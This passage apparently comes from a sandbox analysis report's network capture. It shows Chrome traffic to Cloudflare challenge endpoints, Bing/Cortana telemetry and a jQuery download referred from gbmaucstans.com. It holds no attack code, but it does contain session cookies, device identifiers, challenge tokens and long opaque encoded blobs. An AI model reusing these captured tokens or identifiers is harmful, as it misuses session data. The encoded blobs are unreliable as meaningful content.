                                                      Data Ascii: zBj7y0tIWIyJ2txMvEjIO/0aWLxKOn0JDEsaWdlqvY4M/YrdTToNy8orqf3L3OuevbrOjI0da58uXL9NXn/sq/3r0Hzt360gnX1gL4DtsJ2gHRxwXp+Rvi8Q/m1NnS6REQF+Uh3vMrAwMC9e3m+ykLICf9JST0NAQKLTIoCBo4QRQURhgiRD05HBxJMCpMRUEkJE1EQFMjGDsWXyc2VCsZGy9aUWY0YUNZKiQ3QlJzO0poPy0yOUJpaHI+eTdMe


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.549736104.17.2.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:39 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8753fe19daf9b0e5/1713268593731/8Wn8SnzbY0rE6bf HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:40 UTC208INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:40 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe4e6a3db05a-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:40 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 06 00 00 00 41 08 02 00 00 00 7d f3 42 cb 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRA}BIDAT$IENDB`
                                                      2024-04-16 11:56:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.549737104.17.2.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:40 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:40 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 16 Apr 2024 11:56:40 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: xEtOPTAZsrdsuCAbrZ05vA==$wBbfwvwiwQkqECpAOhXN6w==
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe518e58b06f-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:40 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-04-16 11:56:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14192.168.2.54974223.1.237.91443
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:43 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                      Origin: https://www.bing.com
                                                      Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                      Accept: */*
                                                      Accept-Language: en-CH
                                                      Content-type: text/xml
                                                      X-Agent-DeviceId: 01000A410900D492
                                                      X-BM-CBT: 1696428841
                                                      X-BM-DateFormat: dd/MM/yyyy
                                                      X-BM-DeviceDimensions: 784x984
                                                      X-BM-DeviceDimensionsLogical: 784x984
                                                      X-BM-DeviceScale: 100
                                                      X-BM-DTZ: 120
                                                      X-BM-Market: CH
                                                      X-BM-Theme: 000000;0078d7
                                                      X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                      X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                      X-Device-isOptin: false
                                                      X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                      X-Device-OSSKU: 48
                                                      X-Device-Touch: false
                                                      X-DeviceID: 01000A410900D492
                                                      X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                      X-MSEdge-ExternalExpType: JointCoord
                                                      X-PositionerType: Desktop
                                                      X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                      X-Search-CortanaAvailableCapabilities: None
                                                      X-Search-SafeSearch: Moderate
                                                      X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                      X-UserAgeClass: Unknown
                                                      Accept-Encoding: gzip, deflate, br
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                      Host: www.bing.com
                                                      Content-Length: 2484
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1713268571976&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                      2024-04-16 11:56:43 UTC1OUTData Raw: 3c
                                                      Data Ascii: <
                                                      2024-04-16 11:56:43 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                      Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                      2024-04-16 11:56:44 UTC478INHTTP/1.1 204 No Content
                                                      Access-Control-Allow-Origin: *
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      X-MSEdge-Ref: Ref A: 21015B54FFC840828C4125B9CDD551C5 Ref B: LAX311000114045 Ref C: 2024-04-16T11:56:44Z
                                                      Date: Tue, 16 Apr 2024 11:56:44 GMT
                                                      Connection: close
                                                      Alt-Svc: h3=":443"; ma=93600
                                                      X-CDN-TraceID: 0.57ed0117.1713268603.363708


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.549745104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:57 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 28779
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: 0ac2a8def4e2792
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:57 UTC16384OUTData Raw: 76 5f 38 37 35 33 66 65 31 39 64 61 66 39 62 30 65 35 3d 64 74 46 4c 77 31 68 55 43 31 74 59 62 7a 6d 70 37 51 64 51 59 4c 53 6a 6a 51 6d 4c 58 4b 70 55 68 64 51 68 4b 59 43 55 51 53 51 78 4c 42 6e 68 7a 51 48 25 32 62 51 68 43 32 51 30 51 46 39 32 7a 5a 53 71 5a 51 79 6b 4b 68 30 63 6a 51 68 56 51 33 56 6d 68 4f 59 78 4b 51 5a 73 55 76 4b 68 37 55 51 7a 43 68 68 64 51 33 74 43 6a 4c 68 4b 68 73 64 2b 46 70 4d 41 31 4b 32 68 67 51 63 6a 4c 62 73 51 41 4b 31 50 51 33 73 4a 53 43 46 51 51 39 32 51 64 43 4c 51 70 53 74 55 33 4c 4b 51 68 4e 6a 4e 30 68 4b 76 54 4b 51 38 24 49 45 5a 47 42 78 51 68 78 74 4e 6d 2b 45 6e 54 46 6a 6f 54 4b 51 52 6a 33 2b 41 54 46 6d 51 46 53 46 76 31 6a 36 34 37 43 6a 76 51 63 5a 45 34 48 2d 45 7a 50 4a 76 33 56 64 6b 34 73 7a 39
                                                      Data Ascii: v_8753fe19daf9b0e5=dtFLw1hUC1tYbzmp7QdQYLSjjQmLXKpUhdQhKYCUQSQxLBnhzQH%2bQhC2Q0QF92zZSqZQykKh0cjQhVQ3VmhOYxKQZsUvKh7UQzChhdQ3tCjLhKhsd+FpMA1K2hgQcjLbsQAK1PQ3sJSCFQQ92QdCLQpStU3LKQhNjN0hKvTKQ8$IEZGBxQhxtNm+EnTFjoTKQRj3+ATFmQFSFv1j647CjvQcZE4H-EzPJv3Vdk4sz9
                                                      2024-04-16 11:56:57 UTC12395OUTData Raw: 6a 51 7a 35 75 50 52 4e 74 63 52 4c 6c 53 4e 52 35 49 6c 74 4f 6c 51 76 32 51 4a 51 64 37 4e 67 73 66 35 67 4f 74 38 73 78 32 66 38 49 6c 4d 4c 4e 35 5a 68 69 4d 62 51 64 56 68 56 51 4e 53 6d 55 68 4c 51 35 74 2b 30 56 39 4b 54 4b 46 2b 4c 74 51 54 51 78 6d 68 32 54 70 61 6a 33 51 50 51 4e 6f 70 39 4f 63 57 47 49 2b 74 70 70 5a 4d 47 70 5a 51 49 51 69 72 35 32 68 59 51 56 32 7a 42 49 6a 76 54 4b 7a 33 51 77 4d 5a 4c 70 64 38 75 51 54 4c 66 32 68 63 5a 4d 46 41 38 68 78 51 56 51 78 35 68 31 4c 77 61 2b 70 46 55 6c 49 4d 4c 4b 33 74 31 37 57 33 32 31 41 51 58 4c 6e 4f 6a 74 57 37 73 37 56 31 34 51 30 46 41 7a 38 61 76 57 43 78 4b 70 75 51 52 51 46 43 70 63 51 6e 62 42 4c 51 41 50 37 32 42 4c 31 73 51 57 43 42 43 31 6a 32 4e 6f 66 70 67 55 4c 6f 51 42 4c 68
                                                      Data Ascii: jQz5uPRNtcRLlSNR5IltOlQv2QJQd7Ngsf5gOt8sx2f8IlMLN5ZhiMbQdVhVQNSmUhLQ5t+0V9KTKF+LtQTQxmh2Tpaj3QPQNop9OcWGI+tppZMGpZQIQir52hYQV2zBIjvTKz3QwMZLpd8uQTLf2hcZMFA8hxQVQx5h1Lwa+pFUlIMLK3t17W321AQXLnOjtW7s7V14Q0FAz8avWCxKpuQRQFCpcQnbBLQAP72BL1sQWCBC1j2NofpgULoQBLh
                                                      2024-04-16 11:56:57 UTC1135INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:57 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-out: DEJQe9uim1kcGEpzuxbhIpl1bbBkvKJhaA9NtbjA50jzJCdf12zcYATvl36bHp0AquJWTPoDonWi9fbcVKDKVAmWHOcJIRoCYUZVQ59tIbpxRmBuScDWURHSFsCXtov4$oUccQnCBSAca7nYKKdaFgw==
                                                      cf-chl-out-s: qNoROCw1D90pmWC07SLts4yQKDzCDEw3nwXJ5hRFIYp68ktoFl8ezDlI+LfQnjD95phl5SUAJEJFOyJkBFsT5Xnntt28Iig/z+fUiDxUOTPMCZe+EXCujEaIV2lXQGEypKsXsDaxnYgVnODpVNYkDiSC5iHymQOEIS4yBJzNL/0ASSw7d8VxYQvKA0AM99yXjJ4JciRAEkgEz8eG6x0+8REcRlSDaoo/wiiKn9NegJt4fKu/UOnjQo7ugf31E1rq5UH3ViCb97LcYXFYDstrV1eCSPtQprMvFIwVweh1ONaJ5rhu27evYW73ss+v3fsjtpwqPwhQARqDZm7TvHmEGgRJjFUiaB7noW3Aj/y8W38TRsaD5zsg82Clo9EkJgTqMbQzlHwZge5mGDb1VE4r4kSLAB3WRMdhqStaRI5T3ZvSVjn7MAiNTmQ6RCOeSJls8b4QK8dLT24Rd+p/I/MBGgaAQqSDEW2tiPn4nRA/JTTza9zq8hEw73yNpGUZiInSyuxgNjR4K7B/NuxWCw++LRuwGyV0nprtQYHlV42VJyc5CA2I5GBYJeyiZ+THyqj6SxxN/21Sj9rqA+2vBRaWxSC9ABz/H+VxgccatiT2ZgRNaKSf5SoMd3dRbRxyg0Q+D1tCG9kDCtbWvRsInMY15BH4GbOjYjA4YM7UK8/h6eK3KkSPFxYjA/S9zchvWVe3$kTyCKkkJ1Hi/+839Kcy2Zg==
                                                      Server: cloudflare
                                                      CF-RAY: 8753febc6eec672e-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:57 UTC234INData Raw: 64 35 63 0d 0a 68 56 70 35 69 35 4e 4f 59 6d 43 47 5a 31 56 71 69 48 6c 59 61 6c 69 59 57 58 6d 51 67 32 42 6c 6b 4a 32 6e 6b 35 78 38 68 32 64 37 69 36 36 62 67 6f 2b 67 68 6f 4f 70 74 5a 65 34 69 62 64 33 71 4c 4f 37 65 37 43 53 77 37 36 79 67 72 69 56 70 36 47 63 6a 4b 75 34 6e 71 7a 48 79 36 4c 43 7a 39 43 75 78 64 66 57 7a 37 50 47 31 74 79 64 34 72 65 37 78 65 65 32 6f 64 75 30 74 73 33 47 79 63 76 62 79 63 50 6d 7a 38 4f 79 30 4f 4c 79 78 39 54 63 38 73 2f 62 32 65 34 45 32 64 6a 77 32 51 66 44 75 39 6f 4d 39 67 76 67 36 4d 2f 39 37 51 77 4d 78 2b 54 75 34 2f 54 59 7a 52 37 56 32 41 7a 57 48 39 30 50 49 68 45 55 45 79 49 67 47 41 30 6a 49 78 6b 4f 37 76 6b 55 38 2b 76 2b 43 44 48 71 39
                                                      Data Ascii: d5chVp5i5NOYmCGZ1VqiHlYaliYWXmQg2BlkJ2nk5x8h2d7i66bgo+ghoOptZe4ibd3qLO7e7CSw76ygriVp6GcjKu4nqzHy6LCz9CuxdfWz7PG1tyd4re7xee2odu0ts3GycvbycPmz8Oy0OLyx9Tc8s/b2e4E2djw2QfDu9oM9gvg6M/97QwMx+Tu4/TYzR7V2AzWH90PIhEUEyIgGA0jIxkO7vkU8+v+CDHq9
                                                      2024-04-16 11:56:57 UTC1369INData Raw: 78 6f 54 2b 6a 59 4f 47 69 33 2b 4d 6a 55 79 4f 6b 59 57 2b 68 73 39 4b 30 42 41 50 77 63 63 52 54 4d 51 4b 53 78 58 45 46 4a 4a 46 42 4d 75 4e 6a 73 79 54 30 42 4c 57 78 35 62 50 56 6b 6e 58 7a 4e 46 57 43 63 36 50 45 35 41 55 6e 4e 6f 4e 6a 42 73 64 44 5a 55 64 57 56 35 55 58 64 2f 59 6c 39 35 56 44 30 2b 5a 30 64 67 52 59 78 72 69 48 75 50 52 31 42 50 67 47 46 75 6a 30 2b 4f 56 56 70 6f 57 5a 4e 56 61 59 47 64 6e 32 78 65 6e 6f 57 61 70 6d 5a 33 64 57 31 74 71 35 74 37 6e 57 71 48 73 34 75 59 6b 70 46 35 64 4c 57 54 76 58 69 66 6c 5a 44 44 6d 4d 56 2b 71 49 47 43 6d 4a 71 45 72 59 61 4c 67 73 2b 6a 6e 61 43 51 6e 74 54 46 71 73 4f 59 32 63 32 2f 73 62 76 5a 72 61 50 52 72 37 2b 77 76 72 7a 6a 7a 4b 69 34 78 61 48 51 35 65 6a 65 38 64 50 30 78 72 54 35
                                                      Data Ascii: xoT+jYOGi3+MjUyOkYW+hs9K0BAPwccRTMQKSxXEFJJFBMuNjsyT0BLWx5bPVknXzNFWCc6PE5AUnNoNjBsdDZUdWV5UXd/Yl95VD0+Z0dgRYxriHuPR1BPgGFuj0+OVVpoWZNVaYGdn2xenoWapmZ3dW1tq5t7nWqHs4uYkpF5dLWTvXiflZDDmMV+qIGCmJqErYaLgs+jnaCQntTFqsOY2c2/sbvZraPRr7+wvrzjzKi4xaHQ5eje8dP0xrT5
                                                      2024-04-16 11:56:57 UTC1369INData Raw: 45 42 4d 53 51 53 46 54 4d 2b 46 68 38 34 47 43 34 4e 4b 55 4a 51 4a 43 38 6b 49 69 73 7a 4a 46 67 76 53 43 6b 71 4d 30 77 73 47 54 52 50 47 79 45 34 56 43 41 32 4f 46 63 6a 62 45 64 49 59 7a 35 41 54 69 34 31 53 7a 4e 45 4c 33 64 72 64 30 70 6f 66 6c 4a 64 66 44 56 41 66 32 47 48 61 49 53 48 6a 48 69 43 66 6b 70 4b 6b 58 4b 4d 62 34 5a 31 69 57 53 49 61 70 52 31 54 31 57 59 66 33 35 2b 59 47 4a 69 58 6f 61 65 6b 5a 71 71 6f 49 4b 47 69 57 65 6e 6a 71 75 6e 66 33 5a 78 62 6f 69 79 74 49 32 35 72 59 2f 41 67 4b 43 68 6b 62 79 43 66 35 6d 44 66 49 71 69 6f 61 54 4c 72 34 4f 53 6d 36 4c 54 6c 74 69 70 77 72 47 79 33 4c 57 37 31 5a 36 66 77 63 48 5a 35 65 47 35 78 4b 58 41 75 74 75 6a 34 38 2f 4a 33 39 4b 37 73 2b 54 32 35 74 65 76 36 73 72 32 79 76 72 61 31
                                                      Data Ascii: EBMSQSFTM+Fh84GC4NKUJQJC8kIiszJFgvSCkqM0wsGTRPGyE4VCA2OFcjbEdIYz5ATi41SzNEL3drd0poflJdfDVAf2GHaISHjHiCfkpKkXKMb4Z1iWSIapR1T1WYf35+YGJiXoaekZqqoIKGiWenjqunf3ZxboiytI25rY/AgKChkbyCf5mDfIqioaTLr4OSm6LTltipwrGy3LW71Z6fwcHZ5eG5xKXAutuj48/J39K7s+T25tev6sr2yvra1
                                                      2024-04-16 11:56:57 UTC455INData Raw: 6c 51 52 51 6a 4b 78 59 4c 51 42 31 48 44 30 49 51 48 6c 56 44 54 68 6c 44 4f 52 59 36 53 7a 31 68 58 45 73 33 56 52 30 6a 51 55 67 36 58 56 4d 36 4e 69 42 67 50 7a 35 79 59 69 39 30 64 32 56 47 4e 6b 74 72 63 58 6c 57 56 30 35 50 56 6c 38 2f 54 6c 64 66 59 31 32 4b 59 6c 64 4d 6a 6f 42 78 58 6c 70 70 68 6d 4e 76 62 32 52 69 59 6f 79 53 58 46 43 51 61 31 78 69 65 71 56 31 59 35 6d 49 71 58 35 2f 6f 6c 2b 43 68 34 46 39 73 36 57 50 64 58 2b 4f 75 58 4b 4f 6b 34 64 31 68 35 65 52 6a 59 47 62 6c 5a 4b 4f 6e 6f 4f 45 69 4b 4b 48 77 34 32 6a 69 34 32 62 71 70 2b 70 6c 61 76 5a 30 61 79 7a 73 64 44 49 33 4b 71 77 74 38 54 4e 76 4d 57 7a 31 36 44 5a 77 72 58 66 71 73 54 62 70 38 6a 4e 30 4f 7a 4b 30 75 33 30 75 64 66 49 37 4c 37 74 7a 2f 7a 53 38 4c 7a 53 78 65
                                                      Data Ascii: lQRQjKxYLQB1HD0IQHlVDThlDORY6Sz1hXEs3VR0jQUg6XVM6NiBgPz5yYi90d2VGNktrcXlWV05PVl8/TldfY12KYldMjoBxXlpphmNvb2RiYoySXFCQa1xieqV1Y5mIqX5/ol+Ch4F9s6WPdX+OuXKOk4d1h5eRjYGblZKOnoOEiKKHw42ji42bqp+plavZ0ayzsdDI3Kqwt8TNvMWz16DZwrXfqsTbp8jN0OzK0u30udfI7L7tz/zS8LzSxe
                                                      2024-04-16 11:56:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.549746104.17.2.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:58 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:58 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 16 Apr 2024 11:56:58 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: zsA74h4ho0nzquIeYC3gQA==$3zbl8S34f66wl+OZrpN+8g==
                                                      Server: cloudflare
                                                      CF-RAY: 8753fec09f9a44dd-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:58 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-04-16 11:56:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.549747104.17.24.144435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:58 UTC554OUTGET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1
                                                      Host: cdnjs.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:58 UTC963INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:58 GMT
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=30672000
                                                      ETag: W/"603e8adc-15d9d"
                                                      Last-Modified: Tue, 02 Mar 2021 18:58:36 GMT
                                                      cf-cdnjs-via: cfworker/kv
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Timing-Allow-Origin: *
                                                      X-Content-Type-Options: nosniff
                                                      CF-Cache-Status: HIT
                                                      Age: 398258
                                                      Expires: Sun, 06 Apr 2025 11:56:58 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLM%2FBr6t%2FpYPtTtqSuaQGT804dT9tQnwm%2BN6YtSXEeoytzDwqM18guLVgUDBUwUEbEBvvtxM2pkdxq055TrDv0qvaclSWs8lhAhoGH9s9Ijqn%2BXccpOAoKZIjK9PyD8%2FrCUGrRnP"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=15780000
                                                      Server: cloudflare
                                                      CF-RAY: 8753fec3bc9644ef-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:58 UTC406INData Raw: 33 39 39 61 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                      Data Ascii: 399a/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
